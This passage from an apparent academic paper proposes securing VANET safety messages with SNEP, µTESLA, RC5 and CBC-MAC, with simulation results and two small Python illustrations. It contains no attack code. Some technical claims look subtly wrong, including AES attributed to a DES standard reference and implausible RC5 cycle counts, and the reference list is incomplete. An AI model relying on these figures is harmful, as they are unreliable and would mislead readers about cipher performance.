are easily generated using a specific MAC function with a private key.
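One possible reading of the last sentence is a generator that applies a keyed MAC to an increasing counter. The sketch below assumes this construction; HMAC-SHA256 stands in for the MAC function, and the class name and the dedicated key `k_rand` are hypothetical.

```python
import hashlib
import hmac


class MacRandom:
    """Pseudo-random generator built from a keyed MAC and a counter."""

    def __init__(self, k_rand: bytes):
        self._key = k_rand   # secret key reserved for random generation
        self._counter = 0    # incremented after every output block

    def next_bytes(self, n: int = 8) -> bytes:
        """Return n pseudo-random bytes (1 <= n <= 32 with SHA-256)."""
        if not 0 < n <= 32:
            raise ValueError("n must be between 1 and 32")
        block = hmac.new(self._key, self._counter.to_bytes(8, "big"),
                         hashlib.sha256).digest()
        self._counter += 1
        return block[:n]
```

Such a generator could supply the nonces used for freshness. The output is only as unpredictable as the key is secret, so the key should not be reused for encryption or authentication.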
Figure 3. M1 and M2 are using K1 while later in time M9 and M10 will use the key K2
Choosing the right block cipher algorithm is critical. For example, the AES algorithm, as in reference [16], relies on
lookup tables with many byte patterns, which are too large to be processed in the short time a fast-moving node stays
connected to a VANET. A good choice can be RC5 from [18], given its small code size and high efficiency. It uses
32-bit data rotation and can be optimized for VANET with some code reductions without affecting efficiency.
The counter need not be included in the messages, which keeps the ciphertext small in the VANET environment, where
processing and transmission should be fast and in real time. The counter value varies with time, which leads to
different ciphertexts for the same message at different time stamps. This ensures semantic security, meaning that
repeated messages generate different ciphertexts. To minimize message size and delay, the counter is not transmitted
with the messages, as it exists implicitly at both the sender and the receiver nodes. Newly joining nodes can
synchronize with the BS using SNEP to use the same counter.
Key setup is initialized between the first node in the VANET and the BS with a secret master key; all subsequent key
chains are derived from the original one. As shown in figure 3, M1 is encrypted with both the key and the counter and
then XORed with the current time function. This gives the advantage that a fast-moving vehicle can continuously join
the base stations along its route, as they all apply the same key setup strategy.
• Message authentication: the block cipher in the protocol is reused so that CBC-MAC can be used; the block
construction is shown in figure 4.
• Message integrity: message M is encrypted with the key K_enc and authenticated with the MAC key K_mac, as
shown in (6):
{M}K_enc, MAC(K_mac, {M}K_enc)    (6)
A MAC must be produced for each packet to handle the lossy nature of VANET communications; this MAC
guarantees integrity and authentication at the same time.
Figure 4. Cryptography primitives applied with the counter and time mode
SNEP and µTESLA were evaluated and shown to be efficient and practical for sensor networks in [9], where the
transmission of messages requires only 8 bytes for encryption and authentication. In VANET, where processing and
buffering are not as restricted as in sensor networks, different key generation algorithms can be applied. In
particular, semantic security in VANET can be achieved efficiently using the simple techniques proposed for practical
sensor networks.
For a deeper study of the efficiency and simplicity of the proposed security primitives, simulations were
conducted for location-aware routing protocols, namely DSDV, GPSR, and BMFR.
In the Destination-Sequenced Distance-Vector (DSDV) routing algorithm, nodes periodically transmit their
routing tables to their neighbor nodes, with updates that are either time-synchronized or event-driven [19].
Greedy Perimeter Stateless Routing (GPSR) utilizes the relation between the geographic position of a node and the
nodes targeted by the message [20]. In BMFR [21], a neighbor node is selected for forwarding the message toward the
destination node.
The parameters used in the NC2 Simulation were taken from [21]. When implementing our proposed protocol, the
security size requirements are 40 bytes for the RC5 module, 60 bytes for µTESLA and 20 bytes for the encryption
module. The small size of the encrypted messages plays a basic role in the transmission time, the storage usage in
high-traffic situations, and the delivery ratio, as shown in the simulation results.
Figure 5 shows that the buffer size required by the proposed security protocol is very small compared with the
buffers required by the three routing protocols. This is to be expected given the low storage requirements of the
simple cryptographic primitives it applies, which were initially designed for sensor networks.
The message delays due to the security mechanisms were also tested in the simulation and compared with those of the
other routing protocols, as in figure 6.
The delay in the simulation is the time taken for a packet sent from one node to reach the receiver node, including
buffering, processing and transmitting. The delay of encrypted packets after applying the cryptographic primitives
was very small and negligible compared to the other protocols, as the buffering, processing, and transmitting of the
encrypted messages require few processing cycles and little transmission time.
The proposed primitives were deployed to achieve this goal. Low delay is achieved by using a stream cipher for
encryption, where the size of the encrypted message is almost the size of the plaintext. The MAC uses 8 bytes of every
30-byte message; however, the MAC also achieves integrity, so there is no need to use other message integrity
mechanisms (e.g. a 16-bit CRC). Thus, encrypting and signing messages imposes an overhead of 6 bytes per message
over an unencrypted message with integrity checking, or about 20% of the overall size of the packet [9].
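The overhead figure follows from simple arithmetic on the sizes quoted above, as the short calculation below shows. The variable names are illustrative only.

```python
PACKET_BYTES = 30  # message size quoted from [9]
MAC_BYTES = 8      # MAC carried in every message
CRC_BYTES = 2      # the 16-bit CRC that the MAC makes unnecessary

# Extra bytes compared with an unencrypted message protected by a CRC.
overhead_bytes = MAC_BYTES - CRC_BYTES
overhead_ratio = overhead_bytes / PACKET_BYTES

print(f"{overhead_bytes} bytes, {overhead_ratio:.0%} of the packet")
```

The MAC replaces the CRC rather than being added to it, which is why the net cost is 6 bytes and not 8.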
The RC5 algorithm used in the proposed security protocol requires only 8 instructions per cycle, which leads to very
low processing and transmission cost; encrypting a 30-byte packet requires less than 4 cycles. Applying the security
primitives proposed for sensor networks is adequate for the high-mobility nature of VANET, where the proposed
methods can sign and encrypt each message even with a single security round. The key disclosure can be
dynamically set to time intervals related to the density and mobility of VANET nodes.
8. CONCLUSION
Exchanging messages in VANET in a secure manner is a critical issue and should be researched deeply, with messages
intelligently classified into safety or entertainment categories. Safety and emergency messages, produced by specific
safety sensors and carrying emergency information, must be secured and transmitted or broadcast quickly, with no
delay or loss. For these types of messages, sensor security cryptography primitives are proposed in this article,
namely SNEP for authentication and encryption while ensuring integrity and confidentiality, and µTESLA for secure
authenticated broadcasting. Simulation and analysis of the adopted protocols demonstrated the efficiency of these
primitives in securing messages with negligible delay and minimal buffering and processing requirements. This study
raises the idea of constructing sensor networks in the core infrastructure of VANET, bringing into VANET research
the automated communications of driverless vehicles through secure sensor networks with intelligent capabilities.
REFERENCES:
1. Abdelhamid S., Hassanein H.S., Takahara G. Vehicle as a Mobile Sensor. Procedia Comput. Sci.
2014;34:286–295. doi: 10.1016/j.procs.2014.07.025.
2. Alshaer, J.J. Mobile Object-Tracking Approach using a Combination of Fuzzy Logic and Neural
Networks. Glob. J. Comput. Sci. Technol. E Netw. Web Secur., 15, 13–19, 2015
6. Chen, L., Ng, S., and Wang, G., “Threshold Anonymous Announcement in VANETs,” in IEEE
Journal on Selected Areas in Communications, vol. 29, pp. 605-615, 2011
7. Kounga, G., Walter, T., and Lachmund, S., “Proving Reliability of Anonymous Information in
VANETs,” in IEEE Transactions on Vehicular Technology, vol. 58, no. 6, pp. 2977-2989, 2009.
8. Mahapatra, P., and Naveena, A., “Enhancing Identity Based Batch Verification Scheme for
Security and Privacy in VANET,” in IEEE 7th International Advance Computing Conference,
IACC, pp. 391-396, January 2017.
9. A. Perrig, R. Szewczyk, V. Wen, D. Culler, J.D. Tygar, SPINS: security protocols for sensor
networks, Proceedings of ACM MobiCom'01, Rome, Italy, 2001, pp. 189–199.
10. Raw, R. S., Kumar, M., and Singh, N., “Security challenges, issues and their solutions for
VANET,” in International Journal of Network Security & Its Applications, vol. 5, issue 5, pp.
95–105, 2013.
11. Shukla, N., Dinker, A. G., Srivastava, N., and Singh, A., “Security in vehicular ad hoc network
by using multiple operating channels,” in IEEE 3rd International Conference on Computing
for Sustainable Global Development, INDIACom, pp. 3064-3068, March 2016.
12. Islam, N., “Certificate revocation in vehicular Ad Hoc networks: a novel approach,” in IEEE
International Conference on Networking Systems and Security, NSysS, pp. 1-5, January 2016
13. Ming-Chin Chuang and Chao-Lin Chen, “PPAS: A Privacy Preservation Authentication
Scheme for Vehicular Communication Networks,” International Journal of Innovations in
Engineering and Technology (IJIET), vol.12, no.3, pp. 45-51, Feb. 2019.
14. Ming-Chin Chuang and Jeng-Farn Lee, “TEAM: Trust-Extended Authentication Mechanism
for Vehicular Ad Hoc Networks,” IEEE Systems Journal, vol. 8, no. 3, pp. 749-758,
September 2014.
15. Marvy B. Mansour, Cherif Salama, Hoda K. Mohamed and Sherif A. Hammad, VANET
SECURITY AND PRIVACY – AN OVERVIEW, International Journal of Network Security &
Its Applications (IJNSA) Vol. 10, No.2, pp 13-34,201
16. U. S. National Institute of Standards and Technology (NIST). DES modes of operation.
Federal Information Processing Standards Publication 81 (FIPS PUB 81).
17. Adrian Perrig, Ran Canetti, J.D. Tygar, and Dawn Song. Efficient authentication and signing
of multicast streams over lossy channels. In IEEE Symposium on Security and Privacy, May
2000.
18. R. L. Rivest. The RC5 encryption algorithm. Proc. 1st Workshop on Fast Software
Encryption, pages 86–96, 1995.